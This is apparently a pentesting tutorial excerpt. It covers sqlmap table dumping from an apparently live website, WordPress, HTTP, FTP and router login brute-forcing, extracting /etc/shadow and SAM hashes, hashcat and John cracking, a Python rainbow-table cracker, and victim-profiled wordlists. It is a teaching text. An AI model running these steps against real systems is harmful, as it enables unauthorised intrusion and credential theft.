Copy the original link (without the apostrophe), go to the Kali terminal and run sqlmap. Use -h to list the available switches; here we go straight to the command: sqlmap with the -u switch for the URL, followed by the pasted URL.
sqlmap detects that the DBMS behind this website is MySQL.

Add --dbs to the initial command. This will try to get the list of databases that
lie behind this website. Just press enter and wait for the magic.

You will be able to see that the available databases are information_schema and romanian_svc. We are interested in the romanian_svc database. The next command to issue at this stage is the same as the original one, but with the -D switch to specify the database name, romanian_svc in our case, followed by --tables. The --tables switch fetches all the tables in the romanian_svc database. Press enter and you will see the list of tables in this database.
We are interested in getting the content of the table named, for example, ra_autori. So add that with -T ra_autori and then --columns; it will display all the columns in the table ra_autori under the database romanian_svc. You will see the schema design of the table; it has a couple of columns that we can dump to our local computer.

So just bring back the previous command, remove --columns, use -C and then select the column names, like nume, nume_nd and prenume.
Then add the --dump switch to retrieve the content of this table with all the relevant information in it.
You will be able to see the content of the table, and the dump is now on our PC. sqlmap prints the path where the dump was saved on our computer.

If you want to see it, copy the path, open a new terminal window, type leafpad, paste the path and press enter. This table does not contain confidential information; it is just for tutorial purposes. Some websites might be vulnerable and you might be interested in tables that hold usernames and passwords. Some of the vulnerable websites store their passwords hashed.
The best part about this tool is that it can automatically try to crack these hashes for you. Sometimes sqlmap might not be able to crack the passwords, so you can use other applications or tools like John the Ripper to do that.

Easily Hack a WordPress Site


WPScan is a very important tool that can reveal lots of information about a WordPress website. It will give you information about the version installed, the theme used and any vulnerable components employed. You can also enumerate the users configured on the website.
Used together with the Nikto application, it lets you assess your web server very thoroughly. Go to turnkeylinux.org to download a WordPress virtual machine (https://www.turnkeylinux.org/wordpress), install it, and follow the wizard to set it up, using wpadmin as the username. The process is very easy and straightforward. The initialized machine will look similar to the image below.
So, the IP of the machine is 192.168.1.143. We will go to our Kali machine, open the terminal, and use the command: wpscan --update

It will update the vulnerability database, which is a prerequisite to start using the application. Now invoke the command wpscan --url, then specify the URL, the domain name, or the IP that you want to attack.
It will give us important information about the server type, WordPress version, theme used and plugins installed, as well as backup configuration files. We can extend this command with the -e switch, which stands for enumerate, and tell it to enumerate u, which means users. Now the scanner will start over and attempt to enumerate the users.
Now let me show you what WPScan can enumerate. If you look up the -e switch in the help, it can enumerate vulnerable plugins, vulnerable themes, db exports, and users. With the different switches you will be able to get more information about each.
Now we have a very important piece of information, which is the admin username. Next we will try to brute force this admin username. For this case, I have created a simple wordlist, which is wordlist.txt. But if you are doing a real-world engagement, you can go to wpwhitesecurity.com, follow the link and download the zip file, which has over a million passwords related to WordPress and is very useful.
You can also use the famous rockyou wordlist or the darkc0de wordlist, which have more than 14 million passwords. Now, using the wordlist I created, I will just extend my command: use the --passwords switch and specify the wordlist location, then use the --usernames switch and specify the username, which is admin. You can also set the number of threads, which are parallel attempts to brute force the account. Press Enter and wait for the magic.
wpscan --url http://192.168.1.143 --passwords wordlist.txt --usernames wpadmin
The following explains what the above command does:
--url : The URL of the WordPress website to scan. In the above example, we are scanning http://192.168.1.143.
--passwords : Takes a list of password files (comma separated) to use during the password attack. In this example, we are using the wordlist we created.
--usernames : Specifies one or more usernames (comma separated) to run this attack against. In the above example, the scan targets the user wpadmin.
WPScan will try to identify the password. To prevent user enumeration attacks, avoid using usernames as nicknames, as WPScan will identify usernames from the URLs used. To protect yourself against password brute force attacks, use security plugins that limit login attempts for specific usernames and IP addresses. Also, make sure to set a password lockout or an account lockout time. You can also pass several usernames at once, such as
wpscan --url http://192.168.1.143 --passwords wordlist.txt --usernames wpadmin,kali,kali

Intercept, Analyze, and Replay Web Traffic


Burp Suite is a tool to perform web application security testing. It is available in commercial and free editions; the portswigger.net website provides a comparison between the different versions. I can tell you in advance that it is a must-have tool for penetration testers, and a very important one as it does passive scanning, active scanning, and brute force attacks. It also analyzes the session IDs and tokens generated by the web application to check their level of randomness. Burp Suite can further be used for fuzzing attacks, which are attempts to insert random or garbage data into input fields to test the application's data sanitization.
Run the vulnerable Metasploitable box. As shown below, the IP is
192.168.61.176

Go to your Kali machine and open Burp Suite from the main menu. Make sure to go to the Proxy tab and turn off interception.

With interception on, all requests are queued in the proxy and you need to forward each one to the destination server manually. Disable that feature for the time being. Now go to the Options tab to spot the port Burp Suite is listening on; 8080 in this case.
Now open the web browser (Firefox ESR) on your Kali machine, go to the
preferences and make sure to configure the proxy settings to use the Port
8080, as shown below.

Now all the traffic going out from this browser will pass through our Burp Suite proxy before hitting the server. Let us close that box and navigate to the Metasploitable machine, to the Damn Vulnerable Web Application (DVWA), as shown below.
Now if you go back to Burp Suite, under the Target tab and the Site map sub-tab, you will see that it has identified the applications under the relevant IP.

If we go to DVWA, I will use the username admin and the password password to log in. You will notice that Burp Suite has already recorded this login under the DVWA folder.
This is due to the passive scanning Burp Suite does. If you browse the DVWA site normally, Burp Suite passively scans every page you visit: it takes a look at the pages and checks the responses for vulnerabilities. If you go to the Scanner tab (available only in the professional version), you will be able to see all the results obtained by Burp Suite. It will tell you the issues found on the pages you browsed and color code them based on the criticality of the issue.
Go back again to DVWA and try to log in again using random usernames and passwords. Minimize that and go to Burp Suite again; you will see that it has recorded this attempt.

Now we want to brute force DVWA by trying to guess the username and password. Right-click on the recorded login attempt and choose Send to Intruder.
Go to the Intruder tab, then to the Positions tab; you will see that Burp Suite has identified the parameters that were sent to the server.

Now we are only interested in brute-forcing the username and password, so clear all, then select the username and password values and add them as payload positions.

Now we will choose the type of attack; we have sniper, battering ram, pitchfork, and cluster bomb. A sniper attack is used to brute force one parameter, whereas a cluster bomb is used to brute force more than one parameter. In our case, it is a cluster bomb. Choose that, then go to the Payloads tab; you will see that it has identified two positions under the payload set. Position one is the username; we will select the payload type as a simple list. The same goes for the password payload.

Now going to the payload options, we can add random usernames, but I will
only use admin. As for the password payload options, I will load a wordlist I
created earlier.

The only thing left to do is to press Start attack. Of course, in the professional version you will have more options. The attack will start and you will be able to see the different combinations Burp Suite is trying. Eventually, if you are using the proper wordlists, it will guess the username and the password. Scanning through the results, you will see that the redirect location is login for the unsuccessful attempts, whereas the location is index for the one attempt that is correct.
Simple Ways to Gain Access
Various Password Attacks
We will touch upon a juicy topic on how to gain access to systems.
Theoretically speaking, if you have the right password, you will gain access
to the system. But also, we need to answer the following question: How can I
get the password?
There are two ways to do that, offline or online attacks. An offline attack is
when the target in question has been compromised, and you have acquired
the file that has the hashes of the passwords. The file is usually moved to
your system, where you apply techniques such as brute force, hybrid, or
rainbow table attacks to crack the password, at your own time and
convenience.
Meanwhile, online password attacks happen when you do not have direct access to the system and you are trying to gain access remotely. This is something that usually happens when you are presented with a web form, for example, or another type of authentication form.
The attacker will employ dictionary attacks, brute force attacks, and other types of attacks such as man-in-the-middle, replay, and wire sniffing. The key difference between the two is that for an offline attack to take place you must have the hash of the password, whereas an online attack is live and a bit noisy, as it may alert administrators that an attack is taking place, and you might be blocked. Your IP might be blacklisted and some password policies might apply a lockout period.
It is important to point out that online attacks are more difficult to execute than offline attacks.
Non-technical attacks have to do with phishing techniques, social engineering, and shoulder surfing, which usually takes place in public places, along with dumpster diving, which happens when a criminal digs into the trash of a victim to get more information about possible passwords. Dictionary and brute force attacks are common to both offline and online attacks; they are usually the easiest way to guess passwords. A dictionary attack is when the attacker uses a file of possible words from a dictionary and tries each as the password, either manually or using a system or an application.
A brute force attack is when the attacker picks a character set, such as all the uppercase characters, the lowercase characters, the symbols, or all the numbers, and then generates every combination of those characters as candidate usernames and passwords. This is usually considered a lengthy process.
Hybrid attacks are a combination of attacks. On one side, it is simply a
dictionary attack, while the other is the result of a brute force attack.
Alternatively, you can use rule-based attacks to replace the brute force ones.
Below is a list of attacks, and the techniques used in each.
Offline Password Attacks: Dictionary, Brute force, Hybrid, Rule-based, Rainbow Table
Online Password Attacks: Dictionary, Brute force, Resetting, MITM, Replay, Wire Sniffing
Non-technical Password Attacks: Social Engineering, Shoulder Surfing, Dumpster Diving.
Rule-based attacks happen when you have information about the nature of the target's passwords. If you have the password policy of the victim or of the company that you are ethically attacking, you feed this information into an application that generates passwords matching those criteria. Statistically speaking, this reduces the time needed to crack a password.
A rainbow table is a list of pre-computed hashes, where the corresponding, already-cracked password sits next to each hash. To use it, you simply compare the hash you have with the hashes found in the rainbow table, and if there is a match, BINGO!
For online password attacks, the same techniques apply in terms of using a
dictionary and brute force attacks. In many cases, it is easier to reset a
password than to guess it. If you have access to the system you might use a
bootable Linux CD. With the help of certain applications, you will be able to
find user names and reset their passwords.
Other types of techniques apply when you do not want to interact directly
with the victim, but you are there on the network sniffing, capturing hashes,
and reusing them to authenticate.

Hashing in a Nutshell
A cryptographic hash function is a mathematical function that converts a given input into another string value in a way that cannot be reversed. The resulting value after hashing is typically smaller than the data that passed through the function, and for a given function it always has the same fixed length.
As you can see below, the inputs vary from "Fox" to "The red fox jumps over the blue dog", yet using the same cryptographic hash function the resulting hash, or message digest, has the same length in each case. And if we change just one character, comparing "The red fox jumps over the blue dog" with the input where we removed the v, the resulting value is a totally different hash. To put it another way, hashes are fingerprints of data: a string of random-looking characters that uniquely identifies the data in question.
We can hash anything: text, a sentence, a password, a file, an mp4 file. In short, you can hash anything.

We use hashes for three purposes. The first is to verify files: software creators often run the file you download through a hash function and publish the hash next to the download on their official site. So, to verify that you have downloaded the right file and that it has not been tampered with or infected with malware, you download the file, generate its hash, and compare it with the hash found on the website. If they match, then you have downloaded the right file.
Let us take a simple example, if you open PowerShell, and go to the root.
Suppose that you downloaded a file, and you want to get the hash of this file,
to know that this file has not been compromised, you can do this by running
this command: Get-FileHash and then the name of the file to get its hash.
Now you have to compare it to the hash found on the website that you have
downloaded the file from. If there is a match, then it is the original file.

The other purpose of hashing is password storage. There are two ways
passwords are typically stored on a server. The first is in a clearly visible
plain text, clearly an issue! So, the best way to store passwords is to hash
them first. When you first create a password on a secure system, it hashes the
password before storing it. So, it does not store your actual password in a
database; but it stores the hash of the password, and forgets what you actually
typed. The next time you type in your password, it hashes what you typed in
and compares the hash that is generated with the hash that is stored in the
database, and if there is a match, you will be granted access. This is so
valuable because if the hashes, or even the hash database have been stolen, it
cannot be read by the bad guys supposedly, instead of seeing a list of
passwords, they will see a list of hashes that can be useless.
The third type of usage is database searching. Hashing can speed up the
process of searching through a database, so that when we store a long list of
names in a table, and we need to find a certain name in that list, the computer
can search for the name of course, but that might be a long process because it
has to match a large string of characters. So, we can significantly shorten that
time by creating a hash for every name on the list, and as long as the hash is
shorter than the average name length, then the search will be faster and
easier.
Below is a list of the most commonly used hashes.
Algorithm              Length     Example
SHA-1                  160 bits   5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA-256                256 bits   5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
SHA-512                512 bits   b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d778
MD4                    128 bits   8a9d093f14f8701df17732b2bb182c74
MD5                    128 bits   5f4dcc3b5aa765d61d8327deb882cf99
LM (case insensitive)  128 bits   D6F6E4A3E600550693E28745B8BF4BA6
NT or NTLMv2           128 bits   8846F7EAEE8FB117AD06BDD830B7586C

It would be useful to know the difference between encryption and hashing. Encryption is a two-way function; data is encrypted with the purpose of being decrypted at a later time. This is the only good way to store and move data in a secure fashion. Meanwhile, hashing is never meant to be reversed; it is a one-way process. So, it is not meant to be a secure way to store or move data, but it is purely used as an easy way to compare data or to compare blocks of data.
As you might have realized, there is a problem with hashing: since a hash function produces a fixed-length value, there is a finite number of possible hashes for each algorithm, which makes collisions possible. A collision is when two different inputs produce the same hash. This is rare, but it happens. Naturally, the longer the hash value, the less likely a collision will happen.
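The properties described above (fixed digest length, a totally different hash after a one-character change, file verification against a published digest, and hash-then-compare password storage) in working Python. This is an added example, not code from the book; the file name and the published digest are constructed, and the password part goes one step beyond the book's plain hashing by adding a per-user salt and PBKDF2 iterations, the scheme real systems use so that a stolen hash database cannot simply be looked up in a precomputed table.

```python
import hashlib
import hmac
import os

# Constructed inputs mirroring the book's illustration: a short word, a sentence,
# and the same sentence with the "v" of "over" removed.
SAMPLE_INPUTS = [
    "Fox",
    "The red fox jumps over the blue dog",
    "The red fox jumps oer the blue dog",
]


def digest_hex(data: bytes, algorithm: str) -> str:
    """Hex digest of `data` under a hashlib algorithm name such as 'sha256'."""
    h = hashlib.new(algorithm)
    h.update(data)
    return h.hexdigest()


def digest_lengths(inputs, algorithm="sha256"):
    """Hash each input; return (input, hex digest, digest length in bits)."""
    rows = []
    for text in inputs:
        hx = digest_hex(text.encode("utf-8"), algorithm)
        rows.append((text, hx, len(hx) * 4))  # one hex character is 4 bits
    return rows


def hamming_hex(a: str, b: str) -> int:
    """Bits that differ between two hex digests (shows the avalanche effect)."""
    return bin(int(a, 16) ^ int(b, 16)).count("1")


def verify_download(path: str, published_sha256: str) -> bool:
    """File-integrity check: hash the file in chunks, compare with the published digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    # Constant-time compare; sites publish digests in either letter case.
    return hmac.compare_digest(h.hexdigest().lower(), published_sha256.strip().lower())


# Password storage: keep a salted, iterated hash, never the password itself.
PBKDF2_ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256


def make_password_record(password: str) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex' for the user table."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive the hash with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, hash_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), hash_hex)


if __name__ == "__main__":
    rows = digest_lengths(SAMPLE_INPUTS)
    for text, hx, bits in rows:
        print(f"{bits} bits  {hx}  <- {text!r}")
    print("bits changed by removing one character:",
          hamming_hex(rows[1][1], rows[2][1]), "of 256")
    rec = make_password_record("password")
    print("stored record:", rec)
    print("login with correct password:", verify_password("password", rec))
    print("login with wrong password:  ", verify_password("Password", rec))
```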

Execute an Offline Password Attack on Linux


We will now learn how to perform an offline password attack using an application called Hashcat. Hashcat is currently the world's fastest password cracking software. It supports different types of hashes and uses a numeric code for each hash type.
Suppose that we were able to compromise a Linux machine; next is to get the file holding the password hashes, usually the /etc/shadow file. Open this file; you will see the list of users on this machine and, after the colon, each user's password in hashed form. Copy this file, name it hackedhash.lst, then open the copy in leafpad and clean it.

Remove the user name and the colon that follows it, keep the hash up to the next colon, then remove that colon and the rest of the line. Now you have a clean file that only has hashes; close it. Next we will open hashcat from the main menu (see the steps below).
Once you open it, the help menu will pop up and you will be able to see the different options. Mainly, we will use the -m option, which specifies the hash type, the -a option, which specifies the attack mode, and the -o option, which specifies the output file.

Going down, you will see the hash modes it supports; as I said earlier, lots of hashes: MD4, MD5, the SHA family, etc. To make it easier, you can go to the site hashcat.net, where they are listed in a tabular format. The output formats are hash, plain text, etc.
The attack modes can be straight, which means a dictionary or wordlist attack, combination, brute force, or hybrid wordlist plus mask. The supported device types are CPU, GPU and FPGA.
Because this is the fastest application for password attacks, it does not only run on CPUs; it is optimized to run on GPUs and FPGAs, which are application-specific kinds of processors. So, let us get to the bread and butter and type the command hashcat -m; -m specifies the hash type we want to crack. The password hashing method on this Linux system is SHA-512.
If you go back to the site, the number listed for sha512crypt (SHA-512 Unix) is 1800. So type -m 1800, then -a with the attack mode, for which we will use 0, a plain dictionary attack, then -o for the output, which will be written to the cracked.txt file, and then the location of the hash file, which is hackedhash.lst.
Then we add a simple wordlist, wordlist.txt, and finally --force.
During the cracking phase, you can press s to see the status; it will tell you that it is running, the target hash we want to crack, the start time, and the estimated time, which in this case is around three hours.

If you press s again, you will see the progress, so let us wait. Note that if you use the wrong hash type, the application will give you an error and will not start cracking. So, make sure you do proper research on the type of the hash you are cracking. One application that might be useful is hash-identifier: open it, paste the hash, and it will tell you what kind of hash it is.

Check the application status after a few hours; now you will find that it is
cracked, meaning that the password has been figured out. To be able to see
the password, locate the cracked.txt file, to see the hash that has been
cracked, and the password, as shown below.
Execute an Offline Password Attack on Windows:
In order to crack passwords in offline mode, you must first obtain the hashes stored by the operating system. In our case, the operating system is Windows and these hashes are stored in the SAM file, which is located under C:\Windows\System32\config. If you try to open this SAM file, Windows will tell you that it cannot be opened, so this file is not accessible while the operating system is booted.
If you have physical access to the Windows machine, you can run a Kali live CD, which is capable of reading NTFS drives and mounting the Windows partitions. This way you can copy the SAM file to external media. Now go online to https://www.openwall.com/passwords/windows-pwdump and download a copy of pwdump (password dump).
Extract this folder to the root of the C drive on your Windows machine. Then open the command line in admin mode, go to the pwdump folder, issue the command pwdump.exe, and redirect the output to the cracked.txt file, as shown below.

Go to the pwdump folder and open the cracked.txt file; you will notice that the hashes of the Windows machine have been dumped, and you will see the list of usernames, their IDs, and two hashes separated by a colon. The hash on the left is the old LM hash, and the hash on the right is the newer NT (NTLM) hash, which is more secure.
Copy the NTLM hash and go to the Kali machine, open the terminal, now we
want to create a file to store this hash. Use the command echo, and then
redirect the output to a file named windowshash.txt. Use cat to view the
content of the file, as seen below.

Now we will use John the Ripper to crack this hash. John the Ripper is actually one of my favorite password cracking tools because it supports lots of hashes. It is very easy to use; in your terminal, type john and a help menu will pop up. The syntax is very simple: john, options, password file.
If you run john --list=formats, you will see all the hash formats supported by John. If you do not specify the format, John will try to recognize it on its own. But to make things easier, we will tell john the format of the hash, which is NT, with --format=NT. Specify the file that contains the hash you want to crack, then specify a wordlist, any wordlist. John can use its own wordlist or you can download extra wordlists from the internet. You will learn in the upcoming sections how to create good wordlists. In the meantime, I have created my own wordlist for the sake of this example: --wordlist=wl.lst, just a random wordlist I am using. Hit enter, as shown below.

So obviously, it has figured out the password, which is P@ssw0rd.


Once john figures out a password, it stores it in a file called john.pot. Use locate john.pot to find it, then open that path in leafpad. You will see our NT hash and the cracked password, as shown below.
If you want to crack the same hash again, john will not redo the effort unless you remove the john.pot file. John supports advanced password manipulation during cracking by using rules; issue the command john --list=rules to see the rule sets john can apply when cracking a hash.
These rules include appending trailing characters, alphanumeric substitutions, capitalizing, etcetera. If you want to see the details of these rules, open the file john.conf, search for the word rule, and you will see the details. For example, the rule set called Single shows the password manipulation techniques it applies. Another rule set is called Wordlist, and another is called Extra, which mainly does insertion and overstrike of some characters. You can explore them on your own.

Run an Online Password Attack on Linux


Hydra is a very famous online password cracking tool; it supports many protocols such as Cisco AAA, POP3, SMTP, SIP, Telnet, FTP, SSH, and lots more. Navigate to the main menu and locate Hydra.
The syntax of Hydra is easy: provide a username, a password, and the protocol you want to attack. Use -l to provide a single username or -L for a user list; the same goes for the password: -p to type a single password and -P to use a password list. Similarly, you can provide a list of targets to attack along with the protocol.
Let us spin up a vulnerable Linux and attempt to crack its password. Navigate
to the Rapid7 website and download the metasploitable2 virtual machine
from there. Open your VMware player and import the machine, as shown
below.

Clear the screen and type ifconfig to see the IP address assigned to this machine, to use in the attack. Open another terminal in Kali and run Nmap against the metasploitable2 IP, just to see the services running on the machine; it has lots of services running: FTP, SSH, Telnet, etc.
We want to try to attack this machine on the FTP service. Just type hydra, provide the username msfadmin, and provide a wordlist, which is rockyou.txt. The service to attack is FTP, and I provide the IP address. It is as simple as that; you just wait a couple of minutes, or even seconds, before Hydra pops up the password, which is msfadmin. We will do the same for the Telnet service: just change the protocol from FTP to Telnet, press enter, and hydra will do the same. Quite easy as well. You can do the same for SSH and lots of other services.
Run an Online Password Attack on a Router
We will now attempt to crack the password of the router that connects us to the internet; let us ping it first to make sure that we have a connection. For this purpose, we will use a tool called Medusa to try to figure out the password; once you type medusa, the switch menu will appear. It is actually quite easy to use.
But first, let me explain a bit about Medusa, which is a very fast, massively parallel, modular login brute-forcer. It has modules available to support almost any service that allows remote authentication using a password, such as FTP, POP3, Microsoft SQL, MySQL, SMTP, Telnet, and VNC. Compared to Hydra, which is process-based, Medusa is thread-based, which means it is actually much faster than Hydra. Let us get to the bread and butter and try to crack the password. Issue the command medusa, then provide the host IP using the -h switch, and then the username with -u; usually the default username is admin. For the password, use -P in uppercase and provide the path to the rockyou.txt wordlist. Then specify the protocol module with -M, which is http.

Hit enter and watch Medusa do the work. Medusa will try various passwords
that are found in the wordlist which contains more than 14 million passwords.
It will go through all the options until it finds the right password.

Crack Passwords with Rainbow Tables


The name does not reflect the real nature of its role and sounds like a fun children's game, but it is actually a powerful tool for recovering passwords from hashes. When it comes to password cracking, we have two options. The first is brute-force password cracking programs such as John the Ripper, where an attacker brute forces a password by generating a hash for every attempt, or for every possible password combination he has, and compares the resulting hash to the hash he wants to crack. If he gets a match, then he knows the password. The second option is to load a password cracking dictionary containing hundreds of thousands of commonly used passwords and see if he gets any hits. These methods can take weeks, months, or even years if the passwords are strong enough.
To cut the time short, what if this attacker saves his Brute force work by
creating a table for all the passwords and hashes he was generating, next time
he only compares two hashes, this will save the computation time to convert
an alphanumeric password to a hash, and then compare this hash to the hash
and the table he wants to crack. This will significantly speed up the cracking
process. However, the table would have to be huge to have every possible
password.
So, as you may notice, a rainbow table is a file of pre-computed password
hashes. Rainbow cracking is proven to be more effective and less time
consuming than Brute force and dictionary attacks. It uses less computer
processing time, but more storage. Before we begin to crack hashes using
rainbow tables, we need to generate these rainbow tables. Before doing so,
you need to install the Rainbowcrack application, using apt-get install
rainbowcrack command. You can then generate the files using the command
rtgen along with the appropriate switches, such as
rtgen md5 loweralpha-numeric 1 7 0 2400 24652134 0

The character set can be alphanumeric, lower-alpha, numeric, etcetera. The next two arguments are the minimum and maximum length of the password. Then we have the arguments shown below which relate, to be honest, to advanced cryptographic details; we will not go deep into that now, I will just give you a general guideline. The table index selects the reduction function family used in the generated rainbow table. The chain length is simply the length of each chain you want to generate, and the chain number is the number of chains. As you may notice, a rainbow table is an array of rainbow chains, so you specify how many chains you want in this rainbow table, and the part index is used to store a large rainbow table in smaller chunks. Do not worry about this; just focus on the first couple of arguments.
So, let us start by creating a rainbow table for the MD5 algorithm; we will use numeric as our character set, with a minimum length of one and a maximum length of eight. For the rest we will use default-like values: zero, thousand, thousand, and zero.
Now if go to the directory, we will able to see the rainbow table file
generated. Next, we need to sort this file; we will invoke the command or the
source and just provide the path just by using a dot.

After we have generated the rainbow table and sorted it using the rtsort
command, it is time to crack a hash with it. The cracking binary in the
rainbowcrack package is called rcrack: give it a dot to refer to the rainbow
tables found in the current directory, then the -h argument followed by the hash
(or -l followed by a file containing one hash per line):
rcrack . -h <md5 hash>
For this purpose, go to an online MD5 hash generator and hash any string (1111
in this case). Copy the hash, paste it into the command and hit Enter. It is very
fast, as you will notice, and the result tells you which plaintext the hash
corresponds to.
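To make the rtgen arguments concrete, here is an added Python example, written for this edit and not part of the book or of RainbowCrack, that builds a miniature rainbow table for MD5 over the numeric character set and cracks a hash with it. The reduction function, chain length and chain count are assumed simplifications of rtgen's, chosen so that the whole thing runs in seconds; what it preserves is the structure described above: a table index that selects the reduction function, chains of hash-and-reduce steps of which only the start and end points are kept, and a lookup that finishes the chain from every column the target might occupy.

```python
import hashlib

# Assumed parameters for this demonstration. The reduction function below is a
# simplified stand-in for RainbowCrack's, not rtgen's exact arithmetic.
CHARSET = "0123456789"      # rtgen's "numeric" character set
MIN_LEN, MAX_LEN = 1, 4     # shorter than the 1..8 used in the text, so it runs in seconds
CHAIN_LEN = 50              # rtgen's chain_len argument
TABLE_INDEX = 0             # rtgen's table_index argument: selects the reduction family


def keyspace_size(charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN):
    """Number of plaintexts of length min_len..max_len over charset."""
    return sum(len(charset) ** length for length in range(min_len, max_len + 1))


def index_to_plaintext(idx, charset=CHARSET, min_len=MIN_LEN, max_len=MAX_LEN):
    """Bijection from 0..keyspace_size()-1 to a plaintext; shorter lengths come first."""
    base = len(charset)
    for length in range(min_len, max_len + 1):
        block = base ** length
        if idx < block:
            chars = []
            for _ in range(length):
                chars.append(charset[idx % base])
                idx //= base
            return "".join(reversed(chars))
        idx -= block
    raise ValueError("index outside the keyspace")


def md5(plaintext):
    return hashlib.md5(plaintext.encode()).digest()


def reduce_fn(digest, position, table_index=TABLE_INDEX):
    """Map a hash back into the keyspace. Mixing in the column position is what makes
    this a rainbow table (a different reduction per column) rather than a Hellman table."""
    value = int.from_bytes(digest[:8], "big") + position + (table_index << 16)
    return index_to_plaintext(value % keyspace_size())


def chain_step(plaintext, position, table_index=TABLE_INDEX):
    return reduce_fn(md5(plaintext), position, table_index)


def walk(start, steps, table_index=TABLE_INDEX):
    """Return the plaintext sitting in column `steps` of the chain that begins at `start`."""
    point = start
    for position in range(steps):
        point = chain_step(point, position, table_index)
    return point


def generate_table(num_chains, chain_len=CHAIN_LEN, table_index=TABLE_INDEX):
    """rtgen: walk num_chains chains and keep only endpoint -> start points.
    rtsort sorts these pairs by endpoint; a dict keyed by endpoint gives the same lookup."""
    stride = max(1, keyspace_size() // num_chains)
    table = {}
    for i in range(num_chains):
        start = index_to_plaintext((i * stride) % keyspace_size())
        table.setdefault(walk(start, chain_len, table_index), []).append(start)
    return table


def crack(target_digest, table, chain_len=CHAIN_LEN, table_index=TABLE_INDEX):
    """rcrack: for every column the target might occupy, finish the chain from there,
    look the endpoint up, and replay the chain from its start to recover the plaintext."""
    for position in range(chain_len - 1, -1, -1):
        point = reduce_fn(target_digest, position, table_index)
        for later in range(position + 1, chain_len):
            point = chain_step(point, later, table_index)
        for start in table.get(point, ()):
            candidate = start
            for column in range(chain_len):
                if md5(candidate) == target_digest:
                    return candidate
                candidate = chain_step(candidate, column, table_index)
            # falling through is a false alarm: a merged chain that never held the target
    return None


if __name__ == "__main__":
    table = generate_table(num_chains=400)
    print("chains stored:", sum(len(v) for v in table.values()))
    print("recovered:", crack(md5("1111"), table))   # the hash cracked in the text
```

Run it and compare with rtgen md5 numeric 1 8 0 1000 1000 0: generate_table is rtgen, the dictionary keyed by endpoint is what rtsort produces, and crack is rcrack. Try num_chains=50 and then 4000 to see how coverage, and therefore the chance that a given hash is recovered, rises with table size; that is the storage-for-time trade-off. Prepending a salt before hashing would make every stored chain useless, which is why rainbow tables are only a threat to unsalted hashes.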
Design Effective Wordlists
Wordlists can be obtained from password cracking programs or downloaded from
the internet. General-purpose wordlists contain millions of passwords gathered
from many sources, so they are huge.
For example, you can search the internet for a wordlist called darkc0de, or for
the famous rockyou.txt, which contains more than 14 million real passwords leaked
in the 2009 RockYou breach; Kali ships it compressed under /usr/share/wordlists/.
Suppose that you want to create your own wordlist for a specific target; two
tools serve this purpose. The first is crunch, a wordlist generator based on a
user-specified character set: it takes the characters you designate and writes
every combination of them, within the lengths you choose, into a new wordlist.
The second tool is CUPP, the Common User Passwords Profiler, which is available
on GitHub. Copy the GitHub link, go to your Kali machine, open a terminal and
run git clone followed by the URL, then wait for the repository to be cloned to
your local machine.
Run ls, change into the cupp directory, then list its contents.

Then run python3 cupp.py -i. The -i switch starts interactive mode, which
prompts you with lots of questions: the tool gathers information about the
target and uses that information to generate a tailored wordlist.

Here is an example. Suppose the victim's name is John, the surname is Doe, the
nickname is Joe, and the birth date is 11 December 1992. His partner's name is
Ryan, her nickname is Ray, and her birth date is 02-05-2000. Their child's name
is Will, the child's nickname is Willie, and the birth date is 05-07-2004.
The pet's name is Tom, and the company name is just a random one, Innovate
Corp. Do you want to add some keywords about the victim? If you have some,
add words that describe him: he is handsome, he works in the technology field.
Just imagine the words this victim might be using. Do you want to add special
characters at the end of the words? Yes. Do you want to add random numbers at
the end of the words? Yes.
Do you want to enable leet mode? Yes or no?
Leet mode replaces letters with digits and symbols that resemble them; 1337
resembles leet. In a password like p@ssw0rd, the zero stands for the o and the @
for the a. So we say yes, and after a moment it generates a wordlist containing
more than 60,000 words.
So, let us open the generated list, john.txt; I will use Leafpad for that. The
list contains permutations and combinations of the information we provided about
the victim, and quite possibly the victim is using one of them, because people's
passwords usually include their name, family name, pet's name, birth date,
partner's name, etcetera. This gives your attack a much higher probability of
guessing the password.
Now moving to crunch: just type crunch and hit Enter and you will see the
syntax, which is crunch <min-len> <max-len> [charset] [options].

You specify the minimum and maximum password length you want. If you give
nothing else, crunch uses its default lowercase alphabet, so crunch 4 5 starts
generating a huge wordlist of many millions of candidates; I will just stop it
at some point.
To make things easier, you can specify the character set you want. In this
case I will use the character set abcd123: crunch 4 5 abcd123 only uses these
characters to generate passwords of minimum length four and maximum length
five. If you want to include more digits, add them to the character set and run
it again. You can also write the list to a file with the -o argument, for
example crunch 4 5 abcd123 -o mywordlist.txt, which redirects the output to
that file.

You will notice that it contains every combination of the character set you
chose.

Now, to make things more interesting, suppose that we want to impose a pattern
on the password. The -t option uses special symbols for that: @ stands for a
lowercase letter, a comma for an uppercase letter, % for a digit and ^ for a
symbol; any other character in the pattern is taken literally. Suppose our
pattern is a four-character password, just to make it easier to understand.

We always start with a lowercase letter, then a digit, then an uppercase letter,
and we want the password to always end with the letter Z. So we have a
four-character pattern, -t @%,Z. When you also pass character sets to crunch on
the command line together with -t, they must be given in the order lowercase,
uppercase, digits, symbols, and that is what limits the candidates; with the
sets chosen here it generates 1820 passwords, while the full alphabet and all ten
digits would give 26 x 10 x 26 = 6760. Let us write them to an output file with
-o to make it easier, and open that.
The first letter is lowercase, then a digit every time, then uppercase, then Z,
and these are all the possible combinations. Of course, you can make it more
complex by using longer passwords and an extended character set. For this
purpose, and as we saw with rainbow tables, named character sets live in a
file: crunch ships its own /usr/share/crunch/charset.lst, and RainbowCrack's
charset.txt uses the same format, so either can be used.

